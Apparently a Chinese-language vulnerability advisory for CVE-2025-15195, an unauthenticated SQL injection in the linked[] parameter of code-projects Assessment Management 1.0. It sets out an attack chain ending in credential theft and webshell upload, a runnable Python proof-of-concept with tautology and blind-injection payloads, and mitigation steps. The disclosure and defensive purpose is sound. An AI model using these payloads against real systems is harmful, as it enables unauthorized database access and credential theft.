CVE-2025-15195: code-projects Assessment Management 1.0 SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-15195

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Assessment Management 1.0

漏洞概述

CVE-2025-15195是code-projects Assessment Management 1.0版本中的一个高危SQL注入漏洞。该漏洞存在于/admin/add-module.php文件的未知功能中，攻击者可以通过操纵linked[]参数实现SQL注入攻击。由于该漏洞可远程利用且无需认证，攻击者可以在不需要任何用户交互的情况下发起攻击。此漏洞的CVSS评分为7.3，属于高危级别，对系统的机密性、完整性和可用性都造成一定影响。该漏洞已于2025年12月29日公开披露，攻击代码已被公开，攻击者可能已利用此漏洞进行非法活动。建议受影响的用户立即采取防护措施，避免遭受潜在攻击。

技术细节

该SQL注入漏洞出现在code-projects Assessment Management 1.0的后台管理页面/admin/add-module.php中。漏洞源于应用程序对用户输入的linked[]参数缺乏充分的输入验证和过滤，攻击者可以在HTTP请求中构造恶意的SQL语句片段，当这些数据被拼接到SQL查询中时，将导致SQL注入攻击。攻击者可以利用UNION SELECT、布尔盲注、时间盲注等技术提取数据库中的敏感信息，包括用户凭证、管理员账号、课程数据等。由于漏洞位于管理功能处，攻击成功后可能获得管理员权限，进而控制整个应用程序系统。攻击者还可以通过SQL注入写入恶意文件或执行系统命令，在某些配置下可能导致远程代码执行。

攻击链分析

STEP 1

步骤1

攻击者识别目标系统，确认其运行code-projects Assessment Management 1.0版本

STEP 2

步骤2

攻击者访问/admin/add-module.php管理页面，定位存在SQL注入的linked[]参数

STEP 3

步骤3

攻击者构造恶意SQL注入载荷，通过HTTP POST请求提交到add-module.php

STEP 4

步骤4

利用UNION注入或盲注技术提取数据库中的敏感信息，如管理员账号密码

STEP 5

步骤5

使用获取的凭证登录后台管理界面，进一步扩大攻击成果

STEP 6

步骤6

在某些情况下，攻击者可通过SQL注入写入webshell，实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-15195 SQL Injection PoC
# Target: code-projects Assessment Management 1.0
# Endpoint: /admin/add-module.php

def exploit(target_url, param_value):
    """
    SQL Injection PoC for CVE-2025-15195
    The 'linked[]' parameter in /admin/add-module.php is vulnerable to SQL injection
    """
    url = f"{target_url}/admin/add-module.php"
    
    # Malicious payload in linked[] parameter
    data = {
        'linked[]': param_value,
        'module': 'test_module',
        'course': '1'
    }
    
    try:
        response = requests.post(url, data=data, timeout=10)
        return response.text
    except requests.exceptions.RequestException as e:
        return f"Error: {str(e)}"

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-15195.py <target_url>")
        print("Example: python cve-2025-15195.py http://victim.com")
        sys.exit(1)
    
    target = sys.argv[1]
    
    # Test basic SQL injection
    payload = "1' OR '1'='1"
    print(f"[*] Testing SQL injection on {target}")
    result = exploit(target, payload)
    print(f"[+] Response received, length: {len(result)}")
    
    # Blind boolean injection test
    blind_payload = "1' AND (SELECT CASE WHEN (1=1) THEN 1 ELSE 0 END) AND '1'='1"
    print(f"[*] Testing blind injection")
    exploit(target, blind_payload)

影响范围

code-projects Assessment Management 1.0

防御指南

临时缓解措施

在官方修复方案发布前，可采取以下临时缓解措施：1) 在Web服务器层面配置SQL注入检测规则；2) 临时禁用/admin/add-module.php页面或限制其访问IP；3) 对数据库账户进行权限限制，移除不必要的数据库写权限；4) 启用数据库查询日志监控，及时发现异常SQL行为；5) 实施入侵检测系统监控可疑的网络流量和攻击模式。建议尽快应用官方安全更新。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-15195
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-15195
3 Details https://www.cvedetails.com/cve/CVE-2025-15195/
4 VulDB https://vuldb.com/cve/CVE-2025-15195
5 Link https://code-projects.org/
6 Link https://github.com/Limingqian123/CVE/issues/3
7 Link https://vuldb.com/?ctiid.338582
8 Link https://vuldb.com/?id.338582
9 Link https://vuldb.com/?submit.724717
10 Link https://github.com/Limingqian123/CVE/issues/3